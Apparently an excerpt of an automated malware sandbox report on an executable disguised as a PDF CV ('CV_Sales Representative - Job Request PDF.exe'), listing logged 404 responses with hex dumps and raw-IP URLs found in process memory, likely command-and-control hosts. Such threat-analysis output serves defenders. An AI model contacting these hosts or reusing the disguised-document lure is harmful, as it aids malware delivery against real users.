            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 14 Mar 2025 07:25:06 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 14 Mar 2025 07:25:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:25:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:25:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 14 Mar 2025 07:25:11 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 14 Mar 2025 07:25:19 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186906803.0000000000B3A000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.21
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186953502.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1759623252.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1808457765.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1504609804.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1827184826.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1267060067.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1267060067.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1743852930.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1807715795.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1783483141.0000000000859000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1779767348.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1211266563.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1809068999.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186953502.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/)
            Source: armsvc.exe, 00000001.00000003.1267060067.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196//
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186906803.0000000000B3A000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/0
            Source: armsvc.exe, 00000001.00000003.1807715795.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/2
            Source: armsvc.exe, 00000001.00000003.1211266563.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/6
            Source: armsvc.exe, 00000001.00000003.1267060067.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/Y
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186953502.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1187298126.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186953502.0000000000B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/egxe
            Source: armsvc.exe, 00000001.00000003.1807715795.0000000000842000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1808457765.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1808457765.0000000000843000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1809068999.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/mbtmlu
            Source: armsvc.exe, 00000001.00000003.1807715795.0000000000842000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1808457765.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/mbtmlufi
            Source: armsvc.exe, 00000001.00000003.1267060067.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/o
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186953502.0000000000B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196:80/egxe
            Source: armsvc.exe, 00000001.00000003.1877266320.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.214.183.61/
            Source: armsvc.exe, 00000001.00000003.1779767348.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.214.183.61/2
            Source: armsvc.exe, 00000001.00000003.1779767348.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.214.183.61/Y
            Source: armsvc.exe, 00000001.00000003.1878027562.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.214.183.61/h
            Source: armsvc.exe, 00000001.00000003.1858688778.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877266320.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/
            Source: armsvc.exe, 00000001.00000003.1858688778.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/6
